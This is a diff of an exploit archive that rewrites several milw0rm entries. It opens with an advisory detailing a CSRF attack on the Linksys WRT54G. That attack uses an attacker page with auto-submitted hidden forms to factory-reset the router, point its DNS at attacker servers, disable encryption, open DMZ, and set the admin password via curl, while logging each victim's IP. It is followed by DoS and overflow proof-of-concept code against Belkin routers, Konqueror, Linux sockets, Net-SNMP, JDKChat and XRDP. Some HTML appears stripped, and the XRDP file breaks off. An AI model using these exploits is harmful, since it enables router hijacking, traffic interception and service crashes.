+---------------------- +This text is in addition to the findings I have already made public regarding the Linksys WRT54G +wireless router and firewall gateway device. The scripts that process configuration changes do not +require authentication and therefore can be altered _remotely_ via simple form submissions written +in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous +findings and the demo page with sample exploits. + +++| Let's Get Dirty +---------------------- +You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows +how forms can be constructed in HTML that take advantage of the major flaws present within the +insecure router. In my previous documentation I showed how it is possible to alter configuration +parameters both via Linux command line using curl and HTML form submissions. In this text I +demonstrate how to do these very same things transparently using a combination of HTML form +construction with JavaScript that automagically submits our desired changes. + +The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will +redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO +AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all +that is required in order to submit our form that will be constructed using GET parameters observed +from the device's Web interface. + +document.f.submit(); + +This submits forms hidden within the Webpage. Our first example code enables wireless access with an +SSID of our choosing. In this instance, I will use the SSID "kinqpinz". + +
+ + + + + + + + + + +
+ +The reason this works is simple: configuration parameters are constructed in the URL in the Web +interface, hosted by default at the address http://192.168.1.1. One can view these parameters while +configuring their device. The code above simply constructs a URL that is processed by the router's +IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser: + +http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en + +It's simple enough to understand what's going on. Each variable passed in the URL describes exactly +what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part +to exploiting the router is the fact that you cannot alter settings using a URL like the one above. +That would result in a GET request on behalf of the device, whereas we're interested in POST +requests that actually trigger configuration changes. A GET request does nothing. Below I describe +a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, +and a touch of PHP to grab the mark's external IP. + +++| Remote Real World Attack Scenario +---------------------- +So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It +has made a few assumptions about your environment, however. One major assumption is that you've +kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes +you've made to the router in terms of security, e.g., strong password, wireless encryption, access +restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do +NOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so +that you do not fall victim to a malicious individual hosting code that will be presented in this +text. + +++| Remote Real World Attack Scenario Requirements +---------------------- +On http://www.hacker.tld a page is hosted that contains the following: + (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely; + (2) JavaScript that submits these forms transparently; + (3) PHP or similar server-side code that acquires the mark's external IP address as they browse + the page; and, + (4) PHP or similar server-side code that retains the mark's external IP address in the event that + the remote form submission is successful, thus allowing the remote attacker to further exploit the + device. + +http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP +is used - though any server-side language is suitable - for obtaining the external IP of any +individual viewing the exploit page and writes this information to a log file. + + +The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute +and submitting the form. + + + +All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the +HTML form's 'hidden' attribute. + +
+ + + + + + + + + + +
+ +What you should observe from this is the form name of "f" which is used in the JS to submit the form +as well as the various 'name' and 'value' attributes that are used to create a URL such as this: + +submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en + +Do note that without any one of these parameters, the exploit fails and nothing changes. All of the +elements must remain in place even if they do not directly make sense. They are simply options that +the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case +matters and do not forget that the request must be POST, not GET. Also different config changes +require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log. + +Now that the malicious page has been composed and sits online living and waiting for marks at +http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom +PHP logging script. In mark.txt, our logging file, sample output would resemble something like the +following. + +Potential mark resides at 1.1.1.1 + +Potential mark resides at 2.2.2.2 + +Potential mark resides at 3.3.3.3 + +So forth... + +They are potential marks because it is unknown whether or not they are using the WRT54G with a +supported firmware version that is exploitable using these techniques, and/or the exploit attempt +failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not +using the default local address (good for them) that this attack relies on. + +When they browse the page, because we have set no timeout for this change to occur, they are +instantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, +does not inform the user if they were educated enough of what has just happened, so they may +continue on doing whatever they were doing, more often than not unaware of what has just happened. +At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at +our leisure and further test the remote host whether or not they are vulnerable to attack. At the +very least, we may decide to completely reset the router to rest assured we know its current state +to make further compromise a snap, such as altering the device's DNS records for sniffing traffic. +This is quite feasible, here's how. + +
+ + + +
+ +This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en + +Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs +all incoming and outgoing requests before passing them on to the next in line. + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ +This is indeed convoluted but all of these values must be in place in order to be successful. What +is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our +own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, +and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while +obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the +following URL that is submitted to http://192.168.1.1/Basic.tri. + +http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en + +++| An Alternative (with JavaScript) +---------------------- +This is the basic exploitation method of the router although the attacker has many alternatives of +submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. +A few alternative methods would include using a JavaScript onClick function within a standard +looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.: + +This looks innocent enough. + +...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this +standard looking navigation link, e.g.: + +var xhr=false; +if(window.XMLHttpRequest) { + xhr=new XMLHttpRequest(); +} else if(window.ActiveXObject) { + xhr=new ActiveXObject("Microsoft.XMLHTTP"); +} +function xhrRequest() { + if(xhr) { + xhr.open("POST", "http://192.168.1.1/Security.tri", true); + xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); + xhr.onreadystatechange=function() { + if(xhr.readyState == 4 && xhr.status == 200) { + var success=xhr.responseText; + } + } + xhr.send("SecurityMode=0&layout=en"); + } +} + +The example above effectively disables all wireless encryption so that if you happen to live close +enough to this poor individual, it is your duty to pwn their wireless by enabling open access for +everybody in the neighborhood! Here's the URL for disabling wireless encryption: + +http://192.168.1.1/Security.tri?SecurityMode=0&layout=en + +++| An Alternative (without JavaScript) +---------------------- +You're still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + +NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent +looking methods of compromising your WRT54G. For example, user registration for a bulletin board or +forum system. The site must acquire a minimal amount of information in order to create the account +so it is in submitting this data that we may submit our own payload, perhaps this time we'd like to +enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the +URL once again: + +http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en + +Again it is a different script processing the request on behalf of the router's internal operating +system, dmz.tri, but it still does not require authentication prior to changing the settings we wish +to change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.: + +
+ + + + + +...and add these values to their user registration page with standard username/password/e-mail fields... + + Username:
+ Password:
+ Confirm Password:
+ +
+ +...that can be found on traditional forums these days. The mark submits and exploits his/her own +router although they believe they are at least minimally technically savvy by using a combination of +technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms +we use to store the router configs are hidden, and the normal user registration forms are not, thus +it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has +detected that a potential attack is taking place it is likely too late as the mastermind behind +http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up +targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration +changes within 10 seconds, which is plenty of time for them to open another terminal and change the +administrative login to block our mark from changing their settings, e.g.: + +curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http:///manage.tri + +Here the hacker can now log in as admin with password 'pwn' with complete freedom to _REMOTELY_ +monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords +via DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the +router to a rogue DHCP server and accordingly, rogue network of the attacker's, plus more. + +++| Conclusion +---------------------- +It is my intention in finalizing this document that the reader understands that the Linksys WRT54G +firmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care +whether or not you have the level of privilege thought to be necessary for manipulating sensitive +objects. + +Thanks go to hw2B for suggesting I write all of this garbage out. + +++| URLs +---------------------- +https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document) +https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008) +https://kinqpinz.info/lib/wrt54g/own2.txt (this document) +http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247) + +# milw0rm.com [2008-06-24] diff --git a/platforms/hardware/remote/6305.htm b/platforms/hardware/remote/6305.htm index c10bdce1d..3a3f164ec 100755 --- a/platforms/hardware/remote/6305.htm +++ b/platforms/hardware/remote/6305.htm @@ -1,190 +1,190 @@ - - - - -html code to bypass the webinterface password protection of the Belkin wireless G router + adsl2 modem.
- It worked on model F5D7632-4V6 with upgraded firmware 6.01.08. -
-
- Change dns nameservers (ip's can't be the same)
- - - - - - - -
- - - - -
- -
-
-
-
- Clear log file
- -
-
-
- -
- Change time, pwd(if you have old pwd), remote management, UPnP:)
- and automatic firmware update (nice combined with DNS poisoning)
- - - - - - - - - - - - - - - - - - - - - - - - - - -
old password
- - -
new password, twice
- - - - -
login timeout (1-99 minutes)
- - - -
Time and Time Zone:
- daylight saving :
- - timezone(number)
- - - Enable Automatic Time Server Maintenance
- -
Primary Server - - -
Secondary Server - - - -
Primary Server + + +
Secondary Server + + + +
\n"' > kdie3.html -perl -e 'print "\n" . "
\n"' > kdie4.html -perl -e 'print "\n" . "\n"' > kdie7.html -perl -e 'print "\n" . "\n"' > kdie8.html - -# milw0rm.com [2008-10-08] +KDE's Konqueror & Color Attribute Love + +perl -e 'print "\n" . "\n"' > kdie.html +perl -e 'print "\n" . "
\n"' > kdie2.html +perl -e 'print "\n" . "
\n"' > kdie5.html -perl -e 'print "\n" . "\n"' > kdie6.html -perl -e 'print "\n" . "
\n"' > kdie3.html +perl -e 'print "\n" . "
\n"' > kdie4.html +perl -e 'print "\n" . "\n"' > kdie7.html +perl -e 'print "\n" . "\n"' > kdie8.html + +# milw0rm.com [2008-10-08] diff --git a/platforms/linux/dos/6718.html b/platforms/linux/dos/6718.html index 481331cd0..40efe395b 100755 --- a/platforms/linux/dos/6718.html +++ b/platforms/linux/dos/6718.html @@ -1,10 +1,10 @@ - - - - - -# milw0rm.com [2008-10-10] + + + + + +# milw0rm.com [2008-10-10] diff --git a/platforms/linux/dos/7091.c b/platforms/linux/dos/7091.c index d8fee896a..67ced79e9 100755 --- a/platforms/linux/dos/7091.c +++ b/platforms/linux/dos/7091.c @@ -1,122 +1,122 @@ -#include -#include -#include -#include -#include -#include - -static int own_child(int *us) -{ - int pid; - int s[2]; - struct msghdr mh; - char crap[1024]; - struct iovec iov; - struct cmsghdr *c; - int *fd; - int rc; - - pid = fork(); - if (pid == -1) - err(1, "fork()"); - - if (pid) { - close(us[1]); - - return pid; - } - - close(us[0]); - - memset(&mh, 0, sizeof(mh)); - iov.iov_base = "a"; - iov.iov_len = 1; - - mh.msg_iov = &iov; - mh.msg_iovlen = 1; - mh.msg_control = crap; - mh.msg_controllen = sizeof(crap); - - c = CMSG_FIRSTHDR(&mh); - assert(c); - - c->cmsg_level = SOL_SOCKET; - c->cmsg_type = SCM_RIGHTS; - - fd = (int*) CMSG_DATA(c); - assert(fd); - - c->cmsg_len = CMSG_LEN(sizeof(int)); - mh.msg_controllen = c->cmsg_len; - - while (1) { - if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == -1) - err(1, "socketpair()"); - - *fd = s[0]; - - rc = sendmsg(us[1], &mh, 0); - if (rc == -1) - err(1, "sendmsg()"); - - if (rc != iov.iov_len) - errx(1, "sent short"); - - close(s[0]); - close(us[1]); - us[1] = s[1]; - } -} - -static void own(void) -{ - static int pid; - static int us[2]; - char crap[1024]; - char morte[1024]; - struct cmsghdr *c; - int rc; - struct msghdr mh; - struct iovec iov; - int *fds; - - if (!pid) { - if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == -1) - err(1, "socketpair()"); - pid = own_child(us); - } - - iov.iov_base = morte; - iov.iov_len = sizeof(morte); - - memset(&mh, 0, sizeof(mh)); - mh.msg_iov = &iov; - mh.msg_iovlen = 1; - mh.msg_control = crap; - mh.msg_controllen = sizeof(crap); - - rc = recvmsg(us[0], &mh, 0); - if (rc == -1) - err(1, "recvmsg()"); - - if (rc == 0) - errx(1, "EOF"); - - c = CMSG_FIRSTHDR(&mh); - assert(c); - assert(c->cmsg_type == SCM_RIGHTS); - - fds = (int*) CMSG_DATA(c); - assert(fds); - - close(us[0]); - us[0] = *fds; -} - -int main(int argc, char *argv[]) -{ - own(); - exit(0); -} - -// milw0rm.com [2008-11-11] +#include +#include +#include +#include +#include +#include + +static int own_child(int *us) +{ + int pid; + int s[2]; + struct msghdr mh; + char crap[1024]; + struct iovec iov; + struct cmsghdr *c; + int *fd; + int rc; + + pid = fork(); + if (pid == -1) + err(1, "fork()"); + + if (pid) { + close(us[1]); + + return pid; + } + + close(us[0]); + + memset(&mh, 0, sizeof(mh)); + iov.iov_base = "a"; + iov.iov_len = 1; + + mh.msg_iov = &iov; + mh.msg_iovlen = 1; + mh.msg_control = crap; + mh.msg_controllen = sizeof(crap); + + c = CMSG_FIRSTHDR(&mh); + assert(c); + + c->cmsg_level = SOL_SOCKET; + c->cmsg_type = SCM_RIGHTS; + + fd = (int*) CMSG_DATA(c); + assert(fd); + + c->cmsg_len = CMSG_LEN(sizeof(int)); + mh.msg_controllen = c->cmsg_len; + + while (1) { + if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == -1) + err(1, "socketpair()"); + + *fd = s[0]; + + rc = sendmsg(us[1], &mh, 0); + if (rc == -1) + err(1, "sendmsg()"); + + if (rc != iov.iov_len) + errx(1, "sent short"); + + close(s[0]); + close(us[1]); + us[1] = s[1]; + } +} + +static void own(void) +{ + static int pid; + static int us[2]; + char crap[1024]; + char morte[1024]; + struct cmsghdr *c; + int rc; + struct msghdr mh; + struct iovec iov; + int *fds; + + if (!pid) { + if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == -1) + err(1, "socketpair()"); + pid = own_child(us); + } + + iov.iov_base = morte; + iov.iov_len = sizeof(morte); + + memset(&mh, 0, sizeof(mh)); + mh.msg_iov = &iov; + mh.msg_iovlen = 1; + mh.msg_control = crap; + mh.msg_controllen = sizeof(crap); + + rc = recvmsg(us[0], &mh, 0); + if (rc == -1) + err(1, "recvmsg()"); + + if (rc == 0) + errx(1, "EOF"); + + c = CMSG_FIRSTHDR(&mh); + assert(c); + assert(c->cmsg_type == SCM_RIGHTS); + + fds = (int*) CMSG_DATA(c); + assert(fds); + + close(us[0]); + us[0] = *fds; +} + +int main(int argc, char *argv[]) +{ + own(); + exit(0); +} + +// milw0rm.com [2008-11-11] diff --git a/platforms/linux/dos/7100.pl b/platforms/linux/dos/7100.pl index 22d6d0f34..cdbdcd870 100755 --- a/platforms/linux/dos/7100.pl +++ b/platforms/linux/dos/7100.pl @@ -1,61 +1,61 @@ -#!usr/bin/perl -w - -################################################################################################################ -# Buffer overflow in the __snprint_value function in snmp_get in Net-SNMP 5.1.4, 5.2.4, and 5.4.1, -# as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service (crash) and -# possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair (AVP). -# -# Refer: -# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292 -# http://www.securityfocus.com/bid/29212/discuss -# -# -# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w" -# (say #!C:/Program Files/Perl/bin/perl -w) -# -# This was strictly written for educational purpose. Use it at your own risk. -# Author will not bare any responsibility for any damages watsoever. -# -# Author: Praveen Darshanam -# Email: praveen[underscore]recker[at]sify.com -# Date: 11th November, 2008 -# -# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible -# For reliable security solutions please visit http://www.ipolicynetworks.com/ -# -################################################################################################################## - -use Net::SNMP; - -printf("\nEnter the IP Adress of Vulnerable SNMP Manager Agent: "); -$host_vulnerable = ; -$port = 161; -#default SNMP port -$community = "D" x 5000; - -($session, $error) = Net::SNMP->session( - -hostname => $host_vulnerable, - -port => $port, - -community => $community, - -maxmsgsize => 7000, - ); - if (!defined($session)) - { - printf("ERROR: %s.\n", $error); - exit 1; - } - -$sysUpTime = '1.3.6.1.2.1.1.3.0'; -$snmp_mal_request = $session->get_request( - -varbindlist => [$sysUpTime], - ); - - if (!defined($snmp_mal_request)) { - printf("ERROR: %s.\n", $session->error); - $session->close; - exit 1; - } - -$session->close; - -# milw0rm.com [2008-11-12] +#!usr/bin/perl -w + +################################################################################################################ +# Buffer overflow in the __snprint_value function in snmp_get in Net-SNMP 5.1.4, 5.2.4, and 5.4.1, +# as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service (crash) and +# possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair (AVP). +# +# Refer: +# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292 +# http://www.securityfocus.com/bid/29212/discuss +# +# +# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w" +# (say #!C:/Program Files/Perl/bin/perl -w) +# +# This was strictly written for educational purpose. Use it at your own risk. +# Author will not bare any responsibility for any damages watsoever. +# +# Author: Praveen Darshanam +# Email: praveen[underscore]recker[at]sify.com +# Date: 11th November, 2008 +# +# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible +# For reliable security solutions please visit http://www.ipolicynetworks.com/ +# +################################################################################################################## + +use Net::SNMP; + +printf("\nEnter the IP Adress of Vulnerable SNMP Manager Agent: "); +$host_vulnerable = ; +$port = 161; +#default SNMP port +$community = "D" x 5000; + +($session, $error) = Net::SNMP->session( + -hostname => $host_vulnerable, + -port => $port, + -community => $community, + -maxmsgsize => 7000, + ); + if (!defined($session)) + { + printf("ERROR: %s.\n", $error); + exit 1; + } + +$sysUpTime = '1.3.6.1.2.1.1.3.0'; +$snmp_mal_request = $session->get_request( + -varbindlist => [$sysUpTime], + ); + + if (!defined($snmp_mal_request)) { + printf("ERROR: %s.\n", $session->error); + $session->close; + exit 1; + } + +$session->close; + +# milw0rm.com [2008-11-12] diff --git a/platforms/linux/dos/7150.html b/platforms/linux/dos/7150.html index 71e747a40..1a98c48ea 100755 --- a/platforms/linux/dos/7150.html +++ b/platforms/linux/dos/7150.html @@ -1,26 +1,26 @@ - - - -# milw0rm.com [2008-11-18] + + + +# milw0rm.com [2008-11-18] diff --git a/platforms/linux/dos/815.c b/platforms/linux/dos/815.c index e7c7ae85d..1cbf8f1a0 100755 --- a/platforms/linux/dos/815.c +++ b/platforms/linux/dos/815.c @@ -119,6 +119,6 @@ main ( int argc, char *argv[] ) start ( s ); close ( s ); return ( 0 ); -} - -// milw0rm.com [2005-02-12] +} + +// milw0rm.com [2005-02-12] diff --git a/platforms/linux/dos/8205.pl b/platforms/linux/dos/8205.pl index 3c77eeaa8..b26a02b43 100755 --- a/platforms/linux/dos/8205.pl +++ b/platforms/linux/dos/8205.pl @@ -1,76 +1,76 @@ -#!/usr/bin/perl -# -# Title: JDKChat v1.5 Remote Integer Overflow PoC -# -# Summary: JDKChat is a simple C++ chat server for GNU/Linux systems. -# Users can connect to it through a simple tcp client like telnet. -# -# WebSite : http://www.jdkoftinoff.com/ -# -# ---------------------------- Demo --------------------------------- -# aleks@tux ~ $ telnet 192.168.0.1 7777 -# Trying 192.168.0.1... -# Connected to 192.168.0.1. -# Escape character is '^]'. -# Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd. -# http://www.jdkoftinoff.com/ -# and modified by Aditya Godbole (urwithaditya@gmx.net) -# Commands available: -# /who -- (list all users along with their connection numbers) -# /exit -- (exit chat room) -# /local -- (toggle local mode for your telnet session) -# /[connection number] message -- (send private message to user at -# specified connection number) -# -# -# JDKCHAT: Aleks just entered the room. -# JDKCHAT: Users = Aleks:0 -# Aleks > -# -# -# // And after we run the PoC : -# -# JDKCHAT: PwNzOr just entered the room. -# Aleks >Connection closed by foreign host. -# aleks@tux ~ $ -# -# ---------------------------- /Demo -------------------------------- -# -# -# Vulnerability discovered by n3tpr0b3 & LiquidWorm -# -# n3tpr0b3 [AT] gmail [.] com -# -# 12.03.2009 -# - -use IO::Socket; - -if ($#ARGV != 1) { - print " - JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - # Usage : jdkchat_poc.pl SrvIP SrvPort # - # Greetz to LiquidWorm # - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n"; - exit; -} - -my $dupsa = new IO::Socket::INET ( - PeerAddr => "$ARGV[0]", - PeerPort => "$ARGV[1]", - Proto => "tcp" - ) - or die "Could not connect to $ARGV[0]: $!\n"; - -sleep 1; -print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d"; -print "#--> Loged on t3h JDKChat server...\n"; -sleep 1; -print "#--> Sending our evil command... \n"; -sleep 2; -print $dupsa "\x2f\x2d\x31\x0d"; -close($dupsa); -print "#--> Server pwned... \n"; - -# milw0rm.com [2009-03-12] +#!/usr/bin/perl +# +# Title: JDKChat v1.5 Remote Integer Overflow PoC +# +# Summary: JDKChat is a simple C++ chat server for GNU/Linux systems. +# Users can connect to it through a simple tcp client like telnet. +# +# WebSite : http://www.jdkoftinoff.com/ +# +# ---------------------------- Demo --------------------------------- +# aleks@tux ~ $ telnet 192.168.0.1 7777 +# Trying 192.168.0.1... +# Connected to 192.168.0.1. +# Escape character is '^]'. +# Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd. +# http://www.jdkoftinoff.com/ +# and modified by Aditya Godbole (urwithaditya@gmx.net) +# Commands available: +# /who -- (list all users along with their connection numbers) +# /exit -- (exit chat room) +# /local -- (toggle local mode for your telnet session) +# /[connection number] message -- (send private message to user at +# specified connection number) +# +# +# JDKCHAT: Aleks just entered the room. +# JDKCHAT: Users = Aleks:0 +# Aleks > +# +# +# // And after we run the PoC : +# +# JDKCHAT: PwNzOr just entered the room. +# Aleks >Connection closed by foreign host. +# aleks@tux ~ $ +# +# ---------------------------- /Demo -------------------------------- +# +# +# Vulnerability discovered by n3tpr0b3 & LiquidWorm +# +# n3tpr0b3 [AT] gmail [.] com +# +# 12.03.2009 +# + +use IO::Socket; + +if ($#ARGV != 1) { + print " + JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3 + =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + # Usage : jdkchat_poc.pl SrvIP SrvPort # + # Greetz to LiquidWorm # + =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n"; + exit; +} + +my $dupsa = new IO::Socket::INET ( + PeerAddr => "$ARGV[0]", + PeerPort => "$ARGV[1]", + Proto => "tcp" + ) + or die "Could not connect to $ARGV[0]: $!\n"; + +sleep 1; +print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d"; +print "#--> Loged on t3h JDKChat server...\n"; +sleep 1; +print "#--> Sending our evil command... \n"; +sleep 2; +print $dupsa "\x2f\x2d\x31\x0d"; +close($dupsa); +print "#--> Server pwned... \n"; + +# milw0rm.com [2009-03-12] diff --git a/platforms/linux/dos/8469.c b/platforms/linux/dos/8469.c index d1a86a915..40ab27f43 100755 --- a/platforms/linux/dos/8469.c +++ b/platforms/linux/dos/8469.c @@ -1,3208 +1,3208 @@ -/* - - XRDP <= 0.4.1 pre-auth remote PoC exploit. (xrdp.sourceforge.net) - -******************************************************************************** - - 01:59:56 root@crateria:~/xrdp# gcc -w -lssl -lX11 xrdp-poc.c -o xrdp-poc - 02:00:29 root@crateria:~/xrdp# ./xrdp-poc 10.0.0.13 - - [=] Connected to 10.0.0.13 - [=] Hit CTRL-C if the progress bar stops. - - Be patient! It takes about a minute, the RDP packets - need to be sent spaced apart or the daemon discards them. - - [=] Progress: ******************************************************* - [=] Check port 3389 on target host. It should be offline. - - ~/~ - - [root@norfair xrdp]# cat /etc/issue - CentOS release 4.7 (Final) - [root@norfair xrdp]# ./xrdp -nodaemon - Segmentation fault (core dumped) - -******************************************************************************** - - Quick description of the exploit: - - This is a PoC remote exploit for the XRDP vulnerability found by Hamid Ebadi. - XRDP 0.4.1 is the latest version at the time of this writing. This is *almost* - a really cool exploit, but execution control is difficult to achieve because: - - 1 - The XRDP daemon only accepts valid rdp scancodes as input. (ie, not ASCII - codes, but rdp scancodes that are later translated to ASCII after validation). - This isn't a huge problem. I was able write alpha-numeric shellcode onto the - stack. However, I wasn't able to find any alpha-numeric return addresses we - can use to overwrite the saved EIP, at least on the distros I examined - (Ubuntu 8.10 and CentOS 4.7). There may be distros where this isn't the case. - - 2 - On systems with gcc versions greater than 3.4 (realistically most Linux - boxes today, Ubuntu 8.10 uses 4.3.2), gcc's -O2 option (which xrdp's - Makefile includes) enables _FORTIFY_SOURCE checks, which stop you cold. On - older distros like CentOS 4.7 (gcc 3.4.6), we can successfully overwrite EIP: - - #7 0x61616161 in ?? () - #8 0x61616161 in ?? () - #9 0xb7f59200 in ?? () - #10 0x0804db1e in xrdp_bitmap_def_proc (self=Cannot access memory - at address 0x61616169) at xrdp_bitmap.c:1482 - Previous frame inner to this frame (corrupt stack?) - - #0 0x61616161 in ?? () - (gdb) i r - eax 0x0 0 - ecx 0x8fda860 150841440 - edx 0x97d858 9951320 - ebx 0x61616161 1633771873 - esp 0xb7f59208 0xb7f59208 - ebp 0x61616161 0x61616161 - esi 0x61616161 1633771873 - edi 0x61616161 1633771873 - eip 0x61616161 0x61616161 - - But due to the alpha-numeric requirements for the return address, again, - no dice. Most of the code itself was taken from rdesktop, by Matthew Chapman. - Basically we hack rdesktop to bypass all X-windows interaction, then in - rdp_send_scancode(), we are able to build our payload. If you manage to find - an alternate way to control EIP, drop me a line. - joewalko@gmail.com - -******************************************************************************** -*/ - -#include /* inet_addr */ -#include -#include -#include /* errno */ -#include /* save licence uses it. */ -#include /* open */ -#include -#include /* gethostbyname */ -#include /* sockaddr_in */ -#include /* TCP_NODELAY */ -#include -#include -#include -#include -#include /* getpwuid */ -#include /* va_list va_start va_end */ -#include -#include -#include -#include /* socket connect */ -#include /* socket connect setsockopt */ -#include /* stat */ -#include /* gettimeofday */ -#include /* timeval */ -#include /* times */ -#include /* sockaddr_un */ -#include /* tcgetattr tcsetattr */ -#include -#include /* read close getuid getgid getpid getppid gethostname */ -#include /* select read write close */ -#include -#include -#include - - -//Begin typedefs and structs -typedef int BOOL; -#ifndef True -#define True (1) -#define False (0) -#endif -typedef unsigned char uint8; -typedef signed char sint8; -typedef unsigned short uint16; -typedef signed short sint16; -typedef unsigned int uint32; -typedef signed int sint32; -typedef void *HBITMAP; -typedef void *HGLYPH; -typedef void *HCOLOURMAP; -typedef void *HCURSOR; - -typedef struct _COLOURENTRY -{ - uint8 red; - uint8 green; - uint8 blue; - -} -COLOURENTRY; - -typedef struct _COLOURMAP -{ - uint16 ncolours; - COLOURENTRY *colours; - -} -COLOURMAP; - -typedef struct _BOUNDS -{ - uint16 left; - uint16 top; - uint16 right; - uint16 bottom; - -} -BOUNDS; - -typedef struct _PEN -{ - uint8 style; - uint8 width; - uint8 colour; - -} -PEN; - -typedef struct _BRUSH -{ - uint8 xorigin; - uint8 yorigin; - uint8 style; - uint8 pattern[8]; - -} -BRUSH; - -typedef struct _FONTGLYPH -{ - sint16 offset; - sint16 baseline; - uint16 width; - uint16 height; - HBITMAP pixmap; - -} -FONTGLYPH; - -typedef struct _DATABLOB -{ - void *data; - int size; - -} -DATABLOB; - -typedef struct _key_translation -{ - uint8 scancode; - uint16 modifiers; -} -key_translation; - -/* TCP port for Remote Desktop Protocol */ -#define TCP_PORT_RDP 3389 - -/* ISO PDU codes */ -enum ISO_PDU_CODE -{ - ISO_PDU_CR = 0xE0, /* Connection Request */ - ISO_PDU_CC = 